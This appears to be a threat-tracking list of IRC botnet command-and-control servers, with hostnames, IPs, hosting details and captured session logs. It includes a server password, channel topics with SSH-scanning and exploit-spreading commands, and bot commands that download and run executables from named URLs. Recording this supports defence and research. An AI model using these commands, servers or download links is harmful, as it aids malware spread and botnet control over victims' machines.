irc.wanger.biz(botnet hosted in Germany Dolorem Ipsum)

irc.wanger.biz:8782 46.4.232.76:8782 Nick: :{00-USA-XP-pc7-7123} Username: blaze Server Pass: weed Joined Channel: #sshscan2 Channel Topic for Channel #sshscan2: “.scan sshgodscan 38 8 0 192.x.x.x -n -b |.scan sshgodscan 30 8 0 141.x.x.x -n -b |.scan sshgodscan 30 8 0 218.x.x.x -n -b” Set by Yewnix on Tue Dec 21 20:50:57 Private Message to User {iNF-00-USA-XP-pxb8x8cI: “SC//

server.hostwebserver.info(botnet hosted in United States Chicago Hostforweb Inc)

DNS Lookup Host Name IP Address 0 127.0.0.1 browseusers.myspace.com browseusers.myspace.com 63.135.80.224 www.myspace.com www.myspace.com 63.135.80.46 x.myspacecdn.com x.myspacecdn.com 212.201.100.176 js.myspacecdn.com js.myspacecdn.com 212.201.100.169 c4.ac-images.myspacecdn.com c1.ac-images.myspacecdn.com c4.ac-images.myspacecdn.com 195.176.255.157 c2.ac-images.myspacecdn.com c1.ac-images.myspacecdn.com 195.176.255.136 c2.ac-images.myspacecdn.com 195.176.255.146 c3.ac-images.myspacecdn.com c3.ac-images.myspacecdn.com 195.176.255.138 cms.myspacecdn.com cms.myspacecdn.com 212.201.100.169 b.myspace.com www.google-analytics.com www.google-analytics.com 209.85.149.102 b.myspace.com 63.135.80.58 myspace.ivwbox.de myspace.ivwbox.de 193.46.63.103 qs.ivwbox.de qs.ivwbox.de 91.215.101.32 l.sharethis.com wd.sharethis.com delb.opt.fimserve.com l.sharethis.com 46.51.172.48 wd.sharethis.com 79.125.110.9 delb.opt.fimserve.com

efy2.internetdsl.tpnet.pl(botnet hosted in Poland Krakow Static Ip)

Remote Host Port Number 212.97.132.151 80 95.211.84.41 80 83.15.2.2 31092 NICK US|computername USER yoxuruho UNIX UNIX :username JOIN #all# Resolved : [serv01.colo.owned.hu] To [83.15.2.2] Resolved : [serv01.colo.owned.hu] To [83.233.167.103] Resolved : [serv01.colo.owned.hu] To [81.219.80.126] Resolved : [serv01.colo.owned.hu] To [196.46.191.100] Other details * The following ports were open in the system: Port Protocol Process 1055 TCP

bean.F-QACS.INF(botnet hosted in United Kingdom Knowinservers Ltd)

bean.F-QACS.INFO:5337 178.162.175.63:5337 Nick: [NEW][USA]72014 Username: [NEW][USA]72014 Joined Channel: #ed HKU​S-1-5-21-842925246-1425521274-308236825-500​SOFTWARE​MICROSOFT​WINDOWS​CURRENTVERSION​RUN Windows Service Host C:Documents and SettingsAdministratorApplication Datasvchost.exe infos about hosting: http://whois.domaintools.com/178.162.175.63

a.botsgod.info(VirUs aka lamer botnet hosted in France Gandi)

a.botsgod.info 4949 ##A## Topic is ‘!j #1,#2’ Set by XxX on Wed Dec 22 07:14:52 * Topic is ‘!NAZEL http://dvdmediaplus.in/install.48755.exe s9d8y5.exe 1’ Set by xXx on Wed Dec 22 20:03:17 Topic is ‘!NAZEL http://promofile.info/setup715.exe SDSDSD.exe 1’ Set by XxX on Wed Dec 22 07:18:12 a.botsgod.info ip: 95.142.173.4 a.botsgod.info ip: 95.142.173.176 infos about hosting: http://whois.domaintools.com/95.142.173.4

aaaaaaaa.schooluni.us(buterfly bot hosted in Russian Federation Vline Ltd)

aaaaaaaa.schooluni.us:7196 PASS laorosr Channel#dpi Channel#! NICK [N00_USA_XP_39922187] rssr SP2-917 * 0 :COMPUTERNAME Now talking in #! Topic is ‘.asc -S|.http http://61.136.59.34/mobi.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a’ Set by nonSTOPspread66 on Sat

serv01.colo.owned.hu(botnet hosted with Egypt Afrinic)

Remote Host Port Number 196.46.191.100 31092 212.97.132.151 80 95.211.84.41 80 NICK US|computername USER duiizaui UNIX UNIX :username JOIN #all# JOIN #US Now talking in #all# Topic On: [ #all# ] [ zg8w2CSUq2uia0QJlZCB54+bx1ORaIYwuWdNWqLiaRItRqdzrOHaoL/ZlA/RBgykhuYXvz0p+UCC5AowzlgNggVoLqkXzM+L2HR5WjCPVOsWHS21OdGLfnuALxORajUP/gdM/hRbMXB+mBM995oqart5JdolC5OI ] Modes On: [ #all# ] [ +smntMu ] Resolved : [serv01.colo.owned.hu] To [83.15.2.2] Resolved : [serv01.colo.owned.hu] To [83.233.167.103] Resolved : [serv01.colo.owned.hu] To

adpool-3.net(malware hosted with hosting.ua)

DNS Lookup Host Name IP Address www.microsoft.com 65.55.12.249 dell-d3e62f7e26 10.1.7.2 10.1.1.1 10.1.1.1 wpad adpool-3.net adpool-3.net 178.86.0.144 UDP Connections Opened listening TCP connection on port: 1515 Opened listening TCP connection on port: 6135Download URLs http://178.86.0.144/cgi-bin/npr/web/t_riz.cgi?magic=151561350006&ox=2-5-1-2600&tm=60&id=-1&cache=0880350166 (adpool-3.net) Outgoing connection to remote server: www.microsoft.com port 80 Outgoing connection to remote server: adpool-3.net TCP port 80 Registry Changes by